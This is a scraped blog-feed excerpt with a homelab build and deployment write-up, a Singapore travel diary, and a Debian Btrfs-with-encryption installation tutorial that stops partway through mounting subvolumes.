hybrid cloud setup and eventually a cloud-based Nomad setup. Each iteration provided valuable lessons, consistently highlighting the operational benefits of simplicity.\nThis article details the current state of my homelab. A primary motivation for this build was to dip my toes into “actual” homelabbing—that is, maintaining a physical server at home. The main design goal was to build a dedicated, reliable, and performant server that is easy to maintain. This led me to move away from complex container orchestrators like Kubernetes in favor of a more straightforward Docker Compose workflow. I will cover the hardware build, software architecture, and the rationale behind the key decisions.\nHardware Configuration#\nAfter considerable research, I selected components to balance performance, power efficiency, and cost. The server is designed for 24\u002F7 operation in a home environment, making noise and power consumption important considerations.\nThe Build#\nComponent | Choice | Price\nCPU | AMD Ryzen 5 7600X (6-core, 4.7 GHz) | $167.58\nCPU Cooler | ARCTIC Liquid Freezer III Pro 360 | $89.99\nMotherboard | MSI B650M Gaming Plus WiFi | $225.83\nRAM | Kingston FURY Beast 32GB DDR5-6000 | $136.99\nBoot Drive | WD Blue SN580 500GB NVMe | $88.76\nStorage 1 | WD Red Plus 4TB (5400 RPM) | $99.99\nStorage 2 | Seagate IronWolf Pro 4TB (7200 RPM) | $150.00\nCase | ASUS Prime AP201 MicroATX | $89.99\nPSU | Corsair SF750 (80+ Platinum) | $169.99\nTotal | | $1,219.12\nComponent Rationale#\nCPU: The Ryzen 5 7600X provides a strong price-to-performance ratio. Its 6 cores offer ample headroom for concurrent containerized workloads and future experimentation.\nStorage: The boot drive is a 500GB NVMe for fast OS and application performance. The primary storage consists of two 4TB HDDs in a BTRFS RAID 1 configuration. 
To mitigate the risk of correlated failures, I chose drives from different manufacturers (WD and Seagate) purchased at different times.\nRAM: 32GB of DDR5-6000 provides sufficient memory for a growing number of services without risking contention.\nCase & PSU: The ASUS Prime AP201 is a compact MicroATX case with a clean aesthetic suitable for a home office. The Corsair SF750 (80+ Platinum) PSU was chosen for its efficiency and to provide capacity for a future GPU for local LLM or transcoding workloads.\nSystem Architecture & Deployment#\nMy previous setups involved Kubernetes and Nomad, but the operational overhead proved unnecessary for my use case. I have since standardized on a Git-based, Docker Compose workflow that prioritizes simplicity and transparency.\nDirectory Structure and “Stacks”#\nThe core of the system is a Git repository that holds all configurations. Each service is defined as a self-contained “stack” in its own directory. The structure is organized by machine, making it easy to manage multiple environments:\nhomelab\u002F\n├── deploy.sh                 # Main deployment script\n├── justfile                  # Task runner for common commands\n└── machines\u002F\n    ├── floyd-homelab-1\u002F      # Primary home server\n    │   ├── config.sh         # SSH and deployment settings\n    │   └── stacks\u002F\n    │       ├── immich\u002F\n    │       │   └── docker-compose.yml\n    │       └── paperless\u002F\n    │           └── docker-compose.yml\n    └── floyd-pub-1\u002F          # Public-facing VPS\n        ├── config.sh\n        └── stacks\u002F\n            ├── caddy\u002F\n            └── ntfy\u002F\nThis modular approach allows me to manage each application’s configuration, including its docker-compose.yml and any related files, as an independent unit.\nDeployment Workflow#\nDeployments are handled by a custom deploy.sh script, with a justfile providing a convenient command-runner interface. The process is fundamentally simple:\nSync: rsync copies the specified stack’s directory from the local Git repository to a REMOTE_BASE_PATH (e.g., \u002Fopt\u002Fhomelab) on the target machine.\nExecute: ssh runs the appropriate docker compose command on the remote machine.\nEach machine’s connection settings (SSH_HOST, SSH_USER, REMOTE_BASE_PATH) are defined in its machines\u002F\u003Cname>\u002Fconfig.sh file. This file can also contain pre_deploy and post_deploy hooks for custom actions.\nThe justfile makes daily operations trivial:\n# Deploy a single stack to a machine\njust deploy-stack floyd-homelab-1 immich\n\n# View the logs for a stack\njust logs floyd-homelab-1 immich\n\n# Test a deployment without making changes\njust dry-run floyd-homelab-1\n\nThis system provides fine-grained control over deployments, with support for actions like up, down, restart, pull, and recreate (which also removes persistent volumes).\nContainer & Configuration Patterns#\nTo keep the system consistent, I follow a few key patterns:\nData Persistence: Instead of using Docker named volumes, I use host bind mounts. All persistent data for a service is stored in a dedicated directory on the host, typically \u002Fdata\u002F\u003Cservice-name>. This makes backups and data management more transparent.\nReverse Proxy Network: The Caddy stack defines a shared Docker network called public_proxy. Other stacks that need to be exposed to the internet are configured to join this network. This allows Caddy to discover and proxy them without exposing their ports on the host machine. 
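Docker Compose handles that wiring declaratively, but the underlying operation is small. As a minimal sketch, attaching a container to such a shared network can be done with the Docker Go SDK (the "ntfy" container and "public_proxy" network names are reused from the surrounding examples; this is an illustration of the idea, not the author's tooling):

package main

import (
	"context"
	"log"

	"github.com/docker/docker/client"
)

func main() {
	// Connect to the local Docker daemon using environment defaults.
	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
	if err != nil {
		log.Fatal(err)
	}
	defer cli.Close()

	// Join the shared reverse-proxy network. Caddy, attached to the same
	// network, can then reach the service by container name; no ports
	// are published on the host.
	if err := cli.NetworkConnect(context.Background(), "public_proxy", "ntfy", nil); err != nil {
		log.Fatal(err)
	}
	log.Println("ntfy joined public_proxy")
}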
I have written about this pattern in detail in a previous post.\nPort Exposure: Services behind the reverse proxy use the expose directive in their docker-compose.yml to make ports available to Caddy within the Docker network. I avoid binding ports directly with ports unless absolutely necessary.\nMulti-Machine Topology#\nThe homelab comprises three distinct machines to provide isolation and redundancy.\nfloyd-homelab-1 (Primary Server): The core of the homelab, running on the AMD hardware detailed above. It runs data-intensive personal services (e.g., Immich, Paperless-ngx) and is accessible only via the Tailscale network.\nfloyd-pub-1 (Public VPS): A small cloud VPS that hosts public-facing services requiring high availability, such as DNS utilities, analytics, and notification relays.\nfloyd-monitor-public (Monitoring VPS): A small Hetzner VM running Gatus for health checks. Its independence ensures that I am alerted if the primary homelab or home network goes offline.\nThis distributed setup isolates my home network from the public internet and ensures that critical public services remain online even if the home server is down for maintenance.\nHosted Services#\nThe following is a breakdown of the services, or “stacks,” running on each machine. A few key services that are central to the homelab are detailed further in the next section.\nfloyd-homelab-1 (Primary Server)#\nActual: A local-first personal finance and budgeting tool.\nCaddy: A powerful, enterprise-ready, open source web server with automatic HTTPS.\nGitea: A Git service for personal projects.\nGlance: A dashboard for viewing all my feeds and data in one place.\nImmich: A photo and video backup solution, directly from my mobile phone.\nKarakeep: An app for bookmarking everything, with AI-based tagging and full-text search.\nOwntracks: A private location tracker for recording my own location data.\nPaperless-ngx: A document management system that transforms physical documents into a searchable online archive.\nSilverbullet: A Markdown-based knowledge management and note-taking tool.\nfloyd-monitor-public (Monitoring VPS)#\nCaddy: Reverse proxy for the services on this node.\nfloyd-pub-1 (Public VPS)#\nBeszel-agent: The agent for the Beszel monitoring platform.\nCaddy: Reverse proxy for the services on this node.\nCloak: A service to securely share sensitive text with others.\nDoggo: A command-line DNS Client for Humans, written in Golang.\nNtfy: A self-hosted push notification service.\nprom2grafana: A tool to convert Prometheus metrics to Grafana dashboards and alert rules using AI.\nUmami: A simple, fast, privacy-focused alternative to Google Analytics.\nService Highlights#\nTechnitium: A Powerful DNS Server#\nI came across Technitium DNS after seeing a recommendation from @oddtazz, and it has been a revelation. For anyone who wants more than just basic ad blocking from their DNS server, it’s a game-changer. It serves as both a recursive and authoritative server, meaning I don’t need a separate tool like unbound to resolve from root hints. The level of configuration is incredible—from DNSSEC, custom zones, and SOA records to fine-grained caching control.\nThe UI is a bit dated, but that’s a minor point for me given the raw power it provides. It is a vastly underrated tool for any homelabber who wants to go beyond Pi-hole or AdGuard Home.\n\n\nBeszel: Lightweight Monitoring#\nFor a long time, I felt that monitoring a homelab meant spinning up a full Prometheus and Grafana stack. 
Beszel is the perfect antidote to that complexity. It provides exactly what I need for basic node monitoring—CPU, memory, disk, and network usage—in a simple, lightweight package.\nIt’s incredibly easy to set up and provides a clean, real-time view of my servers without the overhead of a more complex system. For a simple homelab monitoring setup, it’s hard to beat.\n\n\nGatus: External Health Checks#\nWhile Beszel monitors the servers from the inside, Gatus watches them from the outside. Running on an independent Hetzner VM, its job is to ensure my services are reachable from the public internet. It validates HTTP status codes, response times, and more.\nThis separation is crucial; if my entire home network goes down, Gatus is still online to send an alert to my phone. It’s the final piece of the puzzle for robust monitoring, ensuring I know when things are broken even if the monitoring service itself is part of the outage.\n\n\nStorage and Backup Strategy#\nData integrity and recoverability are critical. My strategy is built on layers of redundancy and encryption.\nStorage: BTRFS RAID 1 + LUKS Encryption#\nI chose BTRFS for its modern features:\nChecksumming: Protects against silent data corruption.\nCopy-on-Write: Enables instantaneous, low-cost snapshots.\nTransparent Compression: zstd compression saves space without significant performance overhead.\nThe two 4TB drives are mirrored in a RAID 1 array, providing redundancy against a single drive failure. The entire array is encrypted using LUKS2, with the key stored on the boot SSD for automatic mounting. This protects data at rest in case of physical theft or drive disposal.\nMount options in \u002Fetc\u002Ffstab:\n\u002Fdev\u002Fmapper\u002Fcrypt-sda \u002Fmnt\u002Fstorage btrfs defaults,noatime,compress=zstd 0 2\nBackup: Restic + Cloudflare R2#\nRAID does not protect against accidental deletion, file corruption, or catastrophic failure. My backup strategy follows the 3-2-1 rule.\nDaily, automated backups are managed by systemd timers running restic. Backups are encrypted and sent to Cloudflare R2, providing an off-site copy. R2 was chosen for its zero-cost egress, which is a significant advantage for restores.\nThe backup script covers critical application data and the Docker Compose configurations:\nBACKUP_PATHS=(\n    \"\u002Fmnt\u002Fstorage\"        # All application data\n    \"\u002Fhome\u002Fkaran\u002Fstacks\"  # Docker Compose configs\n)\nEach backup run reports its status to a healthchecks.io endpoint, which sends a push notification on failure. I must appreciate its generous free tier, which is more than sufficient for my needs.\n\n\nConclusion#\nThis homelab represents a shift in philosophy from exploring complexity to valuing simplicity and reliability. The upfront hardware investment of ~$1,200 is offset by eliminating recurring cloud hosting costs and providing complete control over my data and services.\nFor those considering a homelab, my primary recommendation is to start with a simple, well-understood foundation. A reliable machine with a solid backup strategy is more valuable than a complex, hard-to-maintain cluster. 
The goal is to build a system that serves your needs, not one that you serve.",[],{"slug":394,"title":395,"link":396,"pubDate":397,"contentSnippet":398,"tags":399,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"porting-a-python-program-with-help-of-chat-gpt-1","Porting A Python program with help of Chat GPT – #1","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2025\u002F10\u002F01\u002Fporting-a-python-program-with-help-of-chat-gpt-1\u002F","Wed, 01 Oct 2025 12:27:59 +0000","Hi all, in 2024 I started porting a Python library, Open-Tamil (https:\u002F\u002Fgithub.com\u002FEzhil-Language-Foundation\u002Fopen-tamil\u002F). I faced difficulties tracking the port status of the application and mapping the Python symbols to their PHP implementations, as well as testing and documenting the changes over time, because the code base itself is not a small one. So I decided to […]",[224,400,401,402,82],"chatgpt","php","porting",{"slug":404,"title":405,"link":406,"pubDate":407,"contentSnippet":408,"tags":409,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"binary-or-linear-the-hidden-math","Binary or Linear? The Hidden Math Behind Faster Code","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fbinary-or-linear-the-hidden-math","Mon, 29 Sep 2025 14:58:34 GMT","Follow a simple search problem to understand the power of Big O notation.",[],"Shubham Kumar","workdone0","\u002Fimages\u002Fworkdone0_photo.jpg","https:\u002F\u002Fworkdone0.substack.com\u002Ffeed",{"slug":415,"title":416,"link":417,"pubDate":418,"contentSnippet":419,"tags":420,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"singapore-trip","Singapore Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsingapore-trip\u002F","Tue, 23 Sep 2025 17:05:26 +0530","In December 2024, I went on a trip through four countries - Singapore, Malaysia, Brunei, and Vietnam - with my friend Badri. This post covers our experiences in Singapore.\nI took an IndiGo flight from Delhi to Singapore, with a layover in Chennai. At the Chennai airport, I was joined by Badri. We had an early morning flight from Chennai that would land in Singapore in the afternoon. Within 48 hours of our scheduled arrival in Singapore, we submitted an arrival card online. At immigration, we simply needed to scan our passports at the gates, which opened automatically to let us through, and then give our address to an official nearby. The process was quick and smooth, but it unfortunately meant that we didn’t get our passports stamped by Singapore.\nBefore I left the airport, I wanted to visit the nature-themed park with a fountain I saw in pictures online. It is called Jewel Changi, and it took quite some walking to get there. After reaching the park, we saw a fountain that could be seen from all the levels. We roamed around for a couple of hours, then proceeded to the airport metro station to get to our hotel.\n\n      \nA shot of Jewel Changi. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThere were four ATMs on the way to the metro station, but none of them provided us with any cash. This was the first country (outside India, of course!) where my card didn’t work at ATMs.\nTo use the metro, one can tap the EZ-Link card or bank cards at the AFC gates to get in. You cannot buy tickets using cash. Before boarding the metro, I used my credit card to get Badri an EZ-Link card from a vending machine. It was 10 Singapore dollars (₹630) - 5 for the card, and 5 for the balance. 
I had planned to use my Visa credit card to pay for my own fare. I was relieved to see that my card worked, and I passed through the AFC gates.\nWe had booked our stay at a hostel named Campbell’s Inn, which was the cheapest we could find in Singapore. It was ₹1500 per night for dorm beds. The hostel was located in Little India. While Little India has an eponymous metro station, the one closest to our hostel was Rochor.\nOn the way to the hostel, we found out that our booking had been canceled.\nWe had booked from the Hostelworld website, opting to pay the deposit in advance and to pay the balance amount in person upon arrival. However, Hostelworld still tried to charge Badri’s card again before our arrival. When the unauthorized charge failed, they sent an automatic message saying “we tried to charge” and to contact them soon to avoid cancellation, which we couldn’t do as we were on the plane.\nDespite this, we went to the hostel to check the status of our booking.\nThe trip from the airport to Rochor required a couple of transfers. It was 2 Singapore dollars (approx. ₹130) and took approximately an hour.\nUpon reaching the hostel, we were informed that our booking had indeed been canceled, and were not given any reason for the cancellation. Furthermore, no beds were available at the hostel for us to book on the spot.\nWe decided to roam around and look for accommodation at other hostels in the area. Soon, we found a hostel by the name of Snooze Inn, which had two beds available. It was 36 Singapore dollars per person (around ₹2300) for a dormitory bed. Snooze Inn advertised supporting RuPay cards and UPI. Some other places in that area did the same. We paid using my card. We checked in and slept for a couple of hours after taking a shower.\nBy the time we woke up, it was dark. We met Praveen’s friend Sabeel to get my FLX1 phone. We also went to Mustafa Center nearby to exchange Indian rupees for Singapore dollars. Mustafa Center also had a shopping center with shops selling electronic items and souvenirs, among other things. When we were dropping off Sabeel at a bus stop, we discovered that the bus stops in Singapore had a digital board showing the bus routes for the stop and the number of minutes until each bus arrived.\nIn addition to an organized bus system, Singapore had good pedestrian infrastructure. There were traffic lights and zebra crossings for pedestrians to cross the roads. Unlike in Indian cities, rules were being followed. Cars would stop for pedestrians at unmanaged zebra crossings; pedestrians would in turn wait for their crossing signal to turn green before attempting to walk across. Therefore, walking in Singapore was easy.\nTraffic rules were taken so seriously in Singapore that I (as a pedestrian) was afraid of unintentionally breaking them, which could get me in trouble, as rule-breaking is punished with heavy fines in the country. For example, crossing roads without using a marked crossing (while being within 50 meters of it) - also known as jaywalking - is an offence in Singapore.\nMoreover, the streets were litter-free, and cleanliness seemed like an obsession.\nAfter exploring Mustafa Center, we went to a nearby 7-Eleven to top up Badri’s EZ-Link card. He gave 20 Singapore dollars for the recharge, which credited the card with 19.40 Singapore dollars (0.60 dollars being the recharge fee).\nWhen I was planning this trip, I discovered that the World Chess Championship match was being held in Singapore. I seized the opportunity and bought a ticket in advance. 
The next day - the 5th of December - I went to watch the 9th game between Gukesh Dommaraju of India and Ding Liren of China. The venue was a hotel on Sentosa Island, and the ticket was 70 Singapore dollars, which was around ₹4000 at the time.\nWe checked out from our hostel in the morning, as we were planning to stay with Badri’s aunt that night. We had breakfast at a place in Little India. Then we took a couple of buses, followed by a walk to Sentosa Island. Paying the fare for the buses was similar to the metro - I tapped my credit card on the bus, while Badri tapped his EZ-Link card. We also had to tap while getting off.\nIf you are tapping your credit card to use public transport in Singapore, keep in mind that the total amount of all the trips taken in a day is deducted at the end. This makes it hard to determine the cost of individual trips. For example, I could take a bus and get off after tapping my card, but I would have no way to determine how much this journey cost.\nWhen you tap in, the maximum fare amount gets deducted. When you tap out, the balance amount gets refunded (if it’s a shorter journey than the maximum-fare one). So, there is an incentive for passengers not to get off without tapping out. Going by your card statement, it looks like all of that happens virtually, and only one statement comes in at the end. Maybe this combining only happens for international cards.\nWe got off the bus a kilometer away from Sentosa Island and walked the rest of the way. We went on the Sentosa Boardwalk, which is itself a tourist attraction. I was using Organic Maps to navigate to the hotel Resorts World Sentosa, but Organic Maps’ route led us through an amusement park. I tried asking the locals (people working in shops) for directions, but it was a Chinese-speaking region, and they didn’t understand English. Fortunately, we managed to find a local who helped us with the directions.\n\n      \nA shot of Sentosa Boardwalk. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nFollowing the directions, we somehow ended up having to walk on a road which did not have pedestrian paths. Singapore is a country with strict laws, so we did not want to walk on that road. Avoiding that road led us to the Michael Hotel. There was a person standing at the entrance, and I asked him for directions to Resorts World Sentosa. The person told me that the bus (which was standing at the entrance) would drop me there! The bus was a free service for getting to Resorts World Sentosa. Here I parted ways with Badri, who went to his aunt’s place.\nI got to Resorts World Sentosa and showed my ticket to get in. There were two zones inside - the first was a room with a glass wall separating the audience and the players. This was the room to watch the game physically, and it resembled a zoo or an aquarium. :) The room was also a silent room, which meant talking or making noise was prohibited. The audience was only allowed to have mobile phones for the first 30 minutes of the game - since I arrived late, I could not bring my phone inside that room.\nThe other zone was outside this room. It had a big TV on which the game was being broadcast, along with commentary by David Howell and Jovanka Houska - the official FIDE commentators for the event. If you don’t already know, FIDE is the authoritative international chess body.\nI spent most of the time outside that silent room, giving me an opportunity to socialize. A lot of people were from Singapore. I saw many Indians there as well. 
Moreover, I had a good time with Vasudevan, a journalist from Tamil Nadu who was covering the match. He also asked questions to Gukesh during the post-match conference. His questions were in Tamil to lift Gukesh’s spirits, as Gukesh is a Tamil speaker.\nTea and coffee were free for the audience. I also bought a T-shirt from their stall as a souvenir.\nAfter the game, I took a shuttle bus from Resorts World Sentosa to a metro station, then travelled to Pasir Ris by metro, where Badri was staying with his aunt. I thought of getting something to eat, but could not find any cafés or restaurants while I was walking from the Pasir Ris metro station to my destination, and was positively starving when I got there.\nBadri’s aunt’s place was an apartment in a gated community. On the gate was a security guard who asked me the address of the apartment. Upon entering, there were many buildings. To enter the building, you need to dial the number of the apartment you want to go to and speak to them. I had seen that in the TV show Seinfeld, where Jerry’s friends used to dial Jerry to get into his building.\nI was afraid they might not have anything to eat because I told them I was planning to get something on the way. This was fortunately not the case, and I was relieved to not have to sleep with an empty stomach.\nBadri’s uncle gave us an idea of how safe Singapore is. He said that even if you forget your laptop in a public space, you can go back the next day to find it right there in the same spot. I also learned that owning cars was discouraged in Singapore - the government imposes a high registration fee on them, while also making public transport easy to use and affordable. I also found out that 7-Eleven was not that popular among residents in Singapore, unlike in Malaysia or Thailand.\nThe next day was our third and final day in Singapore. We had a bus in the evening to Johor Bahru in Malaysia. We got up early, had breakfast, and checked out from Badri’s aunt’s home. A store by the name of Cat Socrates was our first stop for the day, as Badri wanted to buy some stationery. The plan was to take the metro, followed by the bus. So we got to Pasir Ris metro station. Next to the metro station was a mall. In the mall, Badri found an ATM where our cards worked, and we got some Singapore dollars.\nIt was noon when we reached the stationery shop mentioned above. We had to walk a kilometer from the place where the bus dropped us. It was a hot, sunny day in Singapore, so walking was not comfortable. We had to go through residential areas in Singapore. We saw some non-touristy parts of Singapore.\nAfter we were done with the stationery shop, we went to a hawker center to get lunch. Hawker centers are unique to Singapore. They have a lot of shops that sell local food at cheap prices. It is similar to a food court. However, unlike the food courts in malls, hawker centers are open-air and can get quite hot.\n\n      \nThis is the hawker center we went to. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nTo have something, you just need to buy it from one of the shops and find a table. After you are done, you need to put your tray in the tray-collecting spots. I had a kaya toast with chai, since there weren’t many vegetarian options. I also bought a persimmon from a nearby fruit vendor. On the other hand, Badri sampled some local non-vegetarian dishes.\n\n      \nTable littering at the hawker center was prohibited by law. Photo by Ravi Dwivedi. 
Released under the CC-BY-SA 4.0.\nNext, we took a metro to Raffles Place, as we wanted to visit the Merlion, the icon of Singapore. It is a statue with the head of a lion and the body of a fish. While getting through the AFC (automated fare collection) gates, my card was declined. Therefore, I had to buy an EZ-Link card, which I had been avoiding because the card itself costs 5 Singapore dollars.\nFrom the Raffles Place metro station, we walked to the Merlion. The place also gave a nice view of Marina Bay Sands. It was filled with tourists clicking pictures, and we did the same.\n\n      \nMerlion from behind, giving a good view of Marina Bay Sands. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nAfter this, we went to the bus stop to catch our bus to the border city of Johor Bahru, Malaysia. The bus was more than an hour late, and we worried that we had missed it. I asked an Indian woman at the stop who was waiting for the same bus, and she told us that it was simply late. Finally, our bus arrived, and we set off for Johor Bahru.\nBefore I finish, let me give you an idea of my expenditure. Singapore is an expensive country, and I realized that expenses could go up pretty quickly. Overall, my stay in Singapore for 3 days and 2 nights was approx. 5500 rupees. That too, when we stayed one night at Badri’s aunt’s place (so we didn’t have to pay for accommodation for one of the nights) and didn’t have to pay for a couple of meals. This amount doesn’t include the ticket for the chess game, but it does include the costs of getting there. If you are in Singapore, it is likely you will pay a visit to Sentosa Island anyway.\nStay tuned for our experiences in Malaysia!\nCredits: Thanks to Dione, Sahil, Badri and Contrapunctus for reviewing the draft. Thanks to Bhe for spotting a duplicate sentence.",[],{"slug":422,"title":423,"link":424,"pubDate":425,"contentSnippet":426,"tags":427,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"emptiness","Emptiness","https:\u002F\u002Fwww.prashanthudupa.com\u002Femptiness\u002F","Sun, 14 Sep 2025 17:02:09 +0000","When I take a close look at anything, it seems to dissolve and eventually disappear. Behind everything, there is just emptiness. There is no solid stuff. It’s all empty. I understand that this can be a lot to take all at once. Let’s unpack it gently. What does ‘empty’ mean? The word “empty” means exactly […]",[148,149],{"slug":429,"title":430,"link":431,"pubDate":432,"contentSnippet":433,"tags":434,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"installing-debian-with-btrfs-and-encryption","Installing Debian With Btrfs and Encryption","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Finstalling-debian-with-btrfs-and-encryption\u002F","Sat, 30 Aug 2025 01:53:11 +0530","Motivation\nOn the 8th of August 2025 (a day before the Debian Trixie release), I was upgrading my personal laptop from Debian Bookworm to Trixie. It was a major update. However, the update didn’t go smoothly, and I ran into some errors. From the Debian support IRC channel, I got to know that it would be best if I removed the texlive packages.\nHowever, it was not so easy to just remove texlive with a simple apt remove command. I had to remove the texlive packages from \u002Fusr\u002Fbin. Then I ran into other errors. Hours after I started the upgrade, I realized I preferred having my system as it was before, as I had to travel to Noida the next day. Needless to say, I wanted to go to sleep rather than fix my broken system. 
If only I had a way to go back to the state of my system before I started upgrading, it would have saved me a lot of trouble. I ended up installing Trixie from scratch.\nIt turns out that there was a way to recover the state before the upgrade - using Timeshift to roll the system back to a past state (in our example, the state before the upgrade process started). However, it needs the Btrfs filesystem with appropriate subvolumes, which the Debian installer does not provide in its guided partitioning menu.\nI set this up a few weeks after the above-mentioned incident. Let me demonstrate how it works.\n\n\n\nCheck the screenshot above. It shows a list of snapshots made by Timeshift. Some of them were made by me manually. Others were made by Timeshift automatically as per the schedule - I have set up hourly backups, weekly backups, and so on.\nIn the above-mentioned major update, I could have just taken a snapshot using Timeshift before performing the upgrade and rolled back to that snapshot when I found that I could not spend more time fixing my installation errors. Then I could have just performed the upgrade later.
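As an aside, snapshots do not have to be taken from the GUI. Timeshift also ships a command-line interface; the following is a minimal sketch (assuming Timeshift is already configured for Btrfs snapshots) of what I could have run before starting the upgrade:\nsudo timeshift --create --comments \"before trixie upgrade\"\n\nTo roll back later, you would pick a snapshot from sudo timeshift --list and restore it with sudo timeshift --restore.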
Installation\nIn this tutorial, I will cover how I installed Debian with Btrfs and disk encryption, along with creating the subvolumes @ for root and @home for \u002Fhome so that I can use Timeshift to create snapshots. These snapshots are kept on the same disk where Debian is installed, and the use-case is to roll back to a working system in case I mess something up, or to recover an accidentally deleted file.\nI went through countless tutorials on the Internet, but I didn’t find a single tutorial covering both disk encryption and the above-mentioned subvolumes (on Debian). Debian doesn’t create the desired subvolumes by default; therefore, the process requires some manual steps, which beginners may not be comfortable performing. Beginners can try distros such as Fedora and Linux Mint, as their installers include Btrfs with the required subvolumes.\nFurthermore, it is pertinent to note that I used Debian Trixie’s DVD iso on a real laptop (not a virtual machine) for my installation. Debian Trixie is the codename for the current stable version of Debian. I then took the screenshots in a virtual machine by repeating the process. Moreover, a couple of screenshots are from the installation I did on the real laptop.\nLet’s start the tutorial by booting up the Debian installer.\n\n\n\nThe above screenshot shows the first screen we see on the installer. Since we want to choose Expert Install, we select Advanced Options in the screenshot above.\n\n\n\nLet’s select the Expert Install option in the above screenshot. This is because we want to create the subvolumes after the installer is done with partitioning, and only then proceed to installing the base system. “Non-expert” install modes proceed directly to installing the system right after creating partitions, without pausing for us to create the subvolumes.\n\n\n\nAfter selecting the Expert Install option, you will get the screen above. I will skip to partitioning from here and leave out the intermediate steps such as choosing the language and region, connecting to Wi-Fi, etc. For your reference, I did create the root user.\n\n\n\nLet’s jump right to the partitioning step. Select the Partition disks option from the menu as shown above.\n\n\n\nChoose Manual.\n\n\n\nSelect the disk on which you would like to install Debian.\n\n\n\nSelect Yes when asked about creating a new partition table.\n\n\n\nI chose the msdos option as I am not using UEFI. If you are using UEFI, then you need to choose the gpt option. Also, your steps will (slightly) differ from mine if you are using UEFI. In that case, you can watch this video by the YouTube channel EF Linux in which he creates an EFI partition. As he doesn’t cover disk encryption, you can continue reading this post after following the steps corresponding to EFI.\n\n\n\nSelect the free space option as shown above.\n\n\n\nChoose Create a new partition.\n\n\n\nI chose the partition size to be 1 GB.\n\n\n\nChoose Primary.\n\n\n\nChoose Beginning.\n\n\n\nNow, I got to this screen.\n\n\n\nI changed the mount point to \u002Fboot, turned on the bootable flag, and then selected “Done setting up the partition.”\n\n\n\nNow select free space.\n\n\n\nChoose the Create a new partition option.\n\n\n\nI made the partition size equal to the remaining space on my disk. I do not intend to create a swap partition, so I do not need more space.\n\n\n\nSelect Primary.\n\n\n\nSelect the Use as option to change its value.\n\n\n\nSelect “physical volume for encryption.”\n\n\n\nSelect Done setting up the partition.\n\n\n\nNow select “Configure encrypted volumes.”\n\n\n\nSelect Yes.\n\n\n\nSelect Finish.\n\n\n\nSelecting Yes here erases the existing data, which can take a long time. So, if you can spare the hours for this step (say, on a 1 TB SSD), I would recommend selecting “Yes.” Otherwise, you could select “No” and compromise a little on the quality of the encryption.\nAfter this, you will be asked to enter a passphrase for disk encryption and confirm it. Please do so. I forgot to take the screenshot for that step.\n\n\n\nNow select that encrypted volume as shown in the screenshot above.\n\n\n\nHere we will change a couple of options, which will be shown in the next screenshot.\n\n\n\nIn the Use as menu, select “btrfs journaling file system.”\n\n\n\nNow, click on the mount point option.\n\n\n\nChange it to “\u002F - the root file system.”\n\n\n\nSelect Done setting up the partition.\n\n\n\nThis is a preview of the partitioning after performing the above-mentioned steps.\n\n\n\nIf everything is okay, proceed with the Finish partitioning and write changes to disk option.\n\n\n\nThe installer is reminding us to create a swap partition. I proceeded without it, as I planned to add swap after the installation.\n\n\n\nIf everything looks fine, choose “yes” for writing the changes to disks.\n\n\n\nNow we are done with partitioning, and we are shown the screen in the screenshot above. If we had not selected the Expert Install option, the installer would have proceeded to install the base system without asking us.\nHowever, we want to create the subvolumes before proceeding to install the base system. This is the reason we chose Expert Install.\nNow press Ctrl + Alt + F2.\n\n\n\nYou will see the screen as in the above screenshot. It says “Please press Enter to activate this console.” So, let’s press Enter.\n\n\n\nAfter pressing Enter, we see the above screen.\n\n\n\nThe screenshot above shows the steps I performed in the console. I followed the already mentioned video by EF Linux for this part and adapted it to my situation (he doesn’t encrypt the disk in his tutorial).\nFirst we run df -h to have a look at how our disk is partitioned. 
In my case, the output was:\n# df -h\nFilesystem              Size  Used  Avail   Use% Mounted on\ntmpfs                   1.6G  344.0K  1.6G    0% \u002Frun\ndevtmpfs                7.7G       0  7.7G   0% \u002Fdev\n\u002Fdev\u002Fsdb1               3.7G    3.7G    0   100% \u002Fcdrom\n\u002Fdev\u002Fmapper\u002Fsda2_crypt  952.9G  5.8G  950.9G  0% \u002Ftarget\n\u002Fdev\u002Fsda1               919.7M  260.0K  855.8M  0% \u002Ftarget\u002Fboot\n\ndf -h shows us that \u002Fdev\u002Fmapper\u002Fsda2_crypt and \u002Fdev\u002Fsda1 are mounted on \u002Ftarget and \u002Ftarget\u002Fboot respectively.\nLet’s unmount them, starting with the nested \u002Ftarget\u002Fboot. For that, we run:\n# umount \u002Ftarget\u002Fboot\n# umount \u002Ftarget\n\nNext, let’s mount our root filesystem to \u002Fmnt.\n# mount \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Fmnt\n\nLet’s go into the \u002Fmnt directory.\n# cd \u002Fmnt\n\nUpon listing the contents of this directory, we get:\n\u002Fmnt # ls\n@rootfs\n\nThe Debian installer has created a subvolume @rootfs automatically. However, we need the subvolumes to be @ and @home. Therefore, let’s rename the @rootfs subvolume to @.\n\u002Fmnt # mv @rootfs @\n\nListing the contents of the directory again, we get:\n\u002Fmnt # ls\n@\n\nWe only have one subvolume right now. Therefore, let us go ahead and create another subvolume, @home.\n\u002Fmnt # btrfs subvolume create @home\nCreate subvolume '.\u002F@home'\n\nIf we perform ls now, we will see there are two subvolumes:\n\u002Fmnt # ls\n@ @home\n\nLet us mount \u002Fdev\u002Fmapper\u002Fsda2_crypt to \u002Ftarget with the subvol=@ option.\n\u002Fmnt # mount -o noatime,space_cache=v2,compress=zstd,ssd,discard=async,subvol=@ \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Ftarget\u002F\n\nNow we need to create a directory for \u002Fhome.\n\u002Fmnt # mkdir \u002Ftarget\u002Fhome\u002F\n\nNow we mount the \u002Fhome directory with the subvol=@home 